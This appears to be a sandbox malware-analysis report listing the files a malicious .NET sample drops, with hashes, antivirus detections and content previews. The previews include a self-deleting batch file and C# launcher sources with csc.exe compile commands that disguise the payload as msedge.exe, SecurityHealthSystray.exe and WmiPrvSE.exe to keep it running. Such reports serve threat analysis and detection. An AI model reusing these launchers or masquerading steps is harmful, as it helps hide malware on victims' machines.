Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Program Files (x86)\Windows Defender\en-GB\9292bed4859cea

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with very long lines (352), with no line terminators
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.833597982007578
Encrypted:	false
SSDEEP:	6:gQNC7WzrDQteklnlacCOBmM5oEQA+/gwcJ4EmCtHhNdlMQooTcYfkkFOIfWRpMv4:gZArDq/ac/BlhQAham5ooTAIfWRy4
MD5:	B663399DF8F3A8FE86A1E26030501DF7
SHA1:	B02E33FE5B434BA43D5421BB833AB5783E971F8D
SHA-256:	452290F279E1637635D99B2A5CB5CCC30F662F65C588A2DCD14440EEFB328FF9
SHA-512:	1544D8C27BD2398A32FF4FF1C8A957044BE6D901D7BA23326B268DF08A910E7FD2B0783D2685BCA46E769EE83184DE627273B561DEA3349F3DDD67261DDBD6DA
Malicious:	false
Preview:	J61oUafTct1R4A78kEa3o7YiKspbebQnTG9Cc3N7JICKd1MGsa8hcVqLhSemuDzAdO7yB5gq1cug5OESfjsDdsK8axfJZkMFTBrP4YFx3Rq9kKQTOMGLVvhuD9XNZWRQQpM4hyXHe5KLCLYQhM5MeBuid6M5A1Xh9at57WvZy8rZlVs1kHqNbFvO5oakmcHmhnMlbcSKagXfUU7IOUU2LKG4oeAS6LxV1E28JGaIyfx4rP4krRVRIPaXgR66cAOOtCoPb99H4MDqWLMZkZkozfNlofb1JdpyQiKpkpJsSNW6LuAVFhWDZkYNzCk6hI8bgPZxAhy5P2VmJQa4fFwlGmYqK70iENKK

C:\Program Files (x86)\Windows Defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Recovery\9292bed4859cea

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	5.674594801054905
Encrypted:	false
SSDEEP:	3:YNvTbUQGHX8VjzUnUIG3VAjDVFtmY1f4ddjJo3O9Jj2xhMzN0O6dCra87Tdz99/N:CUQG3EQ9VHmY1f4dd1o3O9JqhM50ndeH
MD5:	AF90D3210776EEC7A55C5ECA32C4BDBA
SHA1:	3E600D1E671C9BC09EE866F4189299D9A9DABB10
SHA-256:	A8AD7EEF8EFC30F1E65F98948156B71063730B2615FB13AE820A225741E9AA13
SHA-512:	3FFBB7DB3463782A6C231314A0FAEAD7F9260FB37D26B0668C7F1E35FC90D3F543AFEF70700FA91E27A71DEDA2D345E45A95422FF278D872FF45FD957240460C
Malicious:	false
Preview:	7qDJpMLIoM1RJ6k8mqJmcbzjrYp6fkOWM4V419XKdpIWvhg9dUW4Lasf0dcRgOmD7eFPlpHnT9IxTdxJ1qdLOULvLzEXgGnOCEYRcQYyMslMR4MXpSZ0vaznSTDvltGNV4uOEgqkRo8gt9eRnrsOqxclPv8JNnMdmX0XJ7SJlyiGcS4TzwH3A2

C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Users\user\9292bed4859cea

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with very long lines (615), with no line terminators
Category:	dropped
Size (bytes):	615
Entropy (8bit):	5.875939092492741
Encrypted:	false
SSDEEP:	12:T9IABximgoz8eD/TXJ0D+rrB9HsymGnk6Jp9Fofc1qDi1i:qABxFgS5LZFlLmk1FDKi1i
MD5:	26F5D8C1E93F382F601F6C73CA5E6B65
SHA1:	689DC24E15E6E6F818BDF8CD50B5C84AFDFF4D9C
SHA-256:	BE7FC67170394BFA6121643690E3779482F7DA0C52C502ACF356EBF070E823B3
SHA-512:	1AF19D87A484D2C4727BEB4C57D0364E852A62A4961A4EE1FC377DF5417C09EA5AFCF06EBD34D560DAC48BC557120DECBF014B57F1C9416D721C73AE868AE831
Malicious:	false
Preview:	5Fqj3OI7dMzelLEhigmasXgvEMo2FI8NT8MRCRS2XgJj3SJiNe1KZP3ij5erkQ2VNmKn9weROuDMN61wCFpkQyyEFosHwlSHoyWRHgja9k5pLqUmDsoekREZyGhUEXenc6hYkkpggOkq2J2YTFDE6xgXt6dB8OWmFSMPJ5BdDH8VqYhpNJB8TaqoZKpnHniR27kj6mPXDkByzKqUZyxzNXTpmiz8QXWZjrdsy7sl4n4sY1yPdUOT0tEfo57XwQHqOmPIr8gbFL4jclQutkf5JCi0n7E2AUyogOdwmqhfxxNoyeCDoMoLuLgLDYft4nauWQDOHdICCAHVz3CI5BOyqn3UrRtNLylKWdRhbx5LElJuELWJWXy3ZmEtXshzu41OY78VleqHFDtEdIQg5j1y9suuYhKsQGbKt4VGMAh1qrxW29QOcA4KCDOqNO6EU809mjUjxKT4CAIS4Y1ZR6QQLQHppo37Edhr0yuToqaSq9IC56wyWhwXrkxVbp3IQW0idacGohulf8jLIFut2EkgrJ9QAY29wSBUJjifeqKyxL2tBlMV4KQMvT1TaLFPpuyN6OCjgOOL3wtgRPOZMgElByjzsPESl4JCWoxwjmz

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PuhmblZdAcSNmlRDfzjrgW.exe.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	937
Entropy (8bit):	5.349223382123555
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4j:MxHKQwYHKGSI6oPtHTHhAHKKkrJHj
MD5:	A7A79F5E708AD9CAB746BB7FD694DE94
SHA1:	BEA03282D7C7E14D3F37ACE7DB0D02070E43D8DC
SHA-256:	43680EAC54990184C4CC5E6F96D3607592E719736A3A525CBACB9E414FD1B161
SHA-512:	E4A6FA109DE5520CD3BF0A3E4F8E73238DF35D1827E679B49D986CA04D1435A964A667703B14168C057C59D3BBA5F43A6624206B52B3F066373461D47A390236
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperProviderbrokermonitorNet.exe.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	247
Entropy (8bit):	5.162474538961304
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5IlMx5siWWX0KOZG1N723fGnHK:HTg9uYDEfPDWWXPa6K
MD5:	2A435432AC79771B2FAEFE4048A9467D
SHA1:	F0F365475114F5DDE1563E0FC97E61B981057687
SHA-256:	8D59BB18D412D2384B7795ACDACD51639B8FE3710FDC6E92141DA36BA8633D0D
SHA-512:	5F4C970305628F3C7BB9A3BEB9EF7058F190A965EC2C4925B431A5626B6C50F679F191D85FD5BE8475DDF8A34553F719419837D2CF33D9BC7E518AE08CF4A21F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\JWcAfTbAe8.bat"

C:\Users\user\AppData\Local\Temp\RES3377.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Sat Jan 11 16:41:33 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	4.608995866595331
Encrypted:	false
SSDEEP:	24:Hcm9BLzmZ4aH04FwKmq+N8lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:HLzmZdeKj+6lmuulB+hnqXSfbNtmhn
MD5:	7A1C7C294B1555626EC5F1F4F8968AB7
SHA1:	F42378AE429813941317A04D91383241F43F397A
SHA-256:	8B5DC8D4AE87A4823FF4DE3A5D774E91F189E265CC94FF49F01EDFCFB1F0F39D
SHA-512:	681F6ED547CF15C955B27BF19347C35A63FE2A526D37D7379B84B2EEA4FA863E068EAFFE2F66F191A4749A0610D072C8E984ECB8A3C08067270E2089EF2FF05D
Malicious:	false
Preview:	L...=..g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RES3377.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\hyperIntoBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

C:\Users\user\AppData\Local\Temp\RES355B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Sat Jan 11 16:41:34 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1952
Entropy (8bit):	4.552778601317303
Encrypted:	false
SSDEEP:	24:HxbW97OfH4aH6wKmq+N0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:LfHdxKj+yluOulajfqXSfbNtmh5Z
MD5:	8B28E27AEC61DFCA48DFA7D5EF127F26
SHA1:	9852C5228A26D34FC210F068EA787DC7C7D9FA1C
SHA-256:	7511D8E9EC2FCFA878D0483575889E01B46B83CB67B9682C57F986951403B5F6
SHA-512:	1CC31E835949D0BF8805EAF9A4ADF4342575FD7C0FE2C1C6F25F358AD45CBB52F23729290FBE043F4C69E50AFBD60028D96642A480BCAAD0EEFA3B875952DE3B
Malicious:	false
Preview:	L...>..g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP.....................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RES355B.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\hyperIntoBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.0.cs

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	4.949386198067799
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LPDWWXjiFkD:JNVQIbSfhWLzIiFkMSfhWLCWXOFkD
MD5:	11591FED424D777F69E9775475A01017
SHA1:	A18833965F3C8DA3D9CF87BAFB24D2BBA757A6A8
SHA-256:	81133766C30590045AA1EBBCE822EB8674F4459C031F16EC890DC8D42D6B9091
SHA-512:	7831F9B0368D87F598FB105930517F2C820E8BEB005F49BE1C8649301B7CEF54C9BBDBE78FBDB21B5BECF59377478595E7CAECAE3C2B7D94B1F1915EA75EDD40
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	268
Entropy (8bit):	5.10873754722182
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fapI6UIC:Hu7L//TRRzscQnaizg
MD5:	786C78135AA069757861D5F54F0C7816
SHA1:	2BCF2B30B247A6C351A6AC217AA05600E66FF379
SHA-256:	0642AD1D1E80001E0687A6CBDD4C4FCDE98BFF26947DEDDAF9FC9F9B1B847A48
SHA-512:	499F207815098F77683D07F4F289A8FF75070C7CB47E4BDD562124B730F8C38D6C00076705301EB09E27D55E18729DA95E9E0402805D1831D858F20807DAB390
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.0.cs"

C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.out

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (343), with CRLF, CR line terminators
Category:	modified
Size (bytes):	764
Entropy (8bit):	5.244087926802485
Encrypted:	false
SSDEEP:	12:5B6BoMI/u7L//TRRzscQnaizVKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:5iI/un/VRzstnaizVKax5DqBVKVrdFAw
MD5:	F637407BD5CDF9D677E0ADE9B20D6132
SHA1:	EDD8DD57EC4EA6573D71A1DE1BB4FDA50A11B556
SHA-256:	20099771B1DE32A50EF9311E44B6CC925FB1171ADCDCDED5DFD387BAA1D7B4DA
SHA-512:	EDA0558FAA77277990B56A8BB2E3594385761EEFE73E5EEE241E25F588194D141A0C8C8D85F60FC6BE7A1D75F5FC1CDDAAFDEC0F1C1E8390197CF75DB7D56D51
Malicious:	false
Preview:	.C:\hyperIntoBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\nTAlTjDIma

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:EWWR/CLpKR:8ZCdK
MD5:	59E6C2D388738F3E43BA1D46ECE8145B
SHA1:	D9DCCE76035C2248639D3534F9B010EAA1C28A97
SHA-256:	6B9619ECAB5C34AB99D5CD16FC999D6E1ACD38D4D0F3DCFBDB61385DA6A71820
SHA-512:	2358D4C1DC1E6B69B16F032A1C6D5A9D37BBA4A41FC364024501EA469E116F92AE01A1CF3150784320C7F5F6A14CC089935DE8C5188AB04081DA2A1357B987C8
Malicious:	false
Preview:	iCdJQBWMRnt1TP2cUC8ZgnLo4

C:\Users\user\AppData\Local\Temp\obippivd\obippivd.0.cs

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	415
Entropy (8bit):	4.929903325494087
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LPDWWXjiFkD:JNVQIbSfhV7TiFkMSfhWLCWXOFkD
MD5:	2C4A87D52BCEFA0F877DDE33B6F17E21
SHA1:	DD97087EF0384EE0DF27790D1578ED2BFB5040A8
SHA-256:	A8AAD0B603C9ED965112D88870C2882DD35AEE7158DDEEB2C3FD3DDDF0B6242D
SHA-512:	28CA1598D3127C002130A6A1785767F16CBF3301F5A49F29E4AC48A0D25B2A7FCDBBA3643685ACB35E27F8E9B10219E96ABF56B04D99F167701EEFF5FDB69C20
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	253
Entropy (8bit):	5.035113516906837
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723f4Kbbn:Hu7L//TRq79cQnagU
MD5:	071842359D6DAA97688E18F693A9706F
SHA1:	1FB68515A48225801818B3F367BCEE2B0C92DBCF
SHA-256:	B7134DEB0625C3255023B0A639D8353664568B3A3C4E05B5E5E999075CA9CBD9
SHA-512:	E0D2B78A19CEE458F3FEA4FBCF50EA9DAFEEEDC335208CD4E5AC11400C9D65D029C8160BC3E71CE04DD00B4986326FDA812745A25DE201209276DFFD4F2CD483
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\obippivd\obippivd.0.cs"

C:\Users\user\AppData\Local\Temp\obippivd\obippivd.out

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (328), with CRLF, CR line terminators
Category:	modified
Size (bytes):	749
Entropy (8bit):	5.237518468232277
Encrypted:	false
SSDEEP:	12:5B6BoMI/u7L//TRq79cQnaghKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:5iI/un/Vq79tna+Kax5DqBVKVrdFAMBt
MD5:	C69A2ADB596480262918D57BBA7CAA60
SHA1:	11C36B26C73FBBA2ACCE6B65748BA014B49986C6
SHA-256:	FCFFF5C4254CA3D68262437BE1CF2D54FB5F5205F0BED24B22C628ACC9DD6AE3
SHA-512:	55BE837504E1F778180A50EBA02A28E0F3EF3B7239297300C519A4C990FE9C4743247B2AAFE8CF06E9491B861F159E39EEF327EFFC40ADD096076B5FB66AA5BC
Malicious:	false
Preview:	.C:\hyperIntoBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\obippivd\obippivd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\BfvFrBjN.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 9%
Joe Sandbox View:	Filename: WinPerfcommon.exe, Detection: malicious, Browse Filename: hz7DzW2Yop.exe, Detection: malicious, Browse Filename: 3XtEci4Mmo.exe, Detection: malicious, Browse Filename: lEwK4xROgV.exe, Detection: malicious, Browse Filename: zZ1Y43bxxV.exe, Detection: malicious, Browse Filename: updIMdPUj8.exe, Detection: malicious, Browse Filename: eP6sjvTqJa.exe, Detection: malicious, Browse Filename: YGk3y6Tdix.exe, Detection: malicious, Browse Filename: QH67JSdZWl.exe, Detection: malicious, Browse Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GQKmsfxg.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
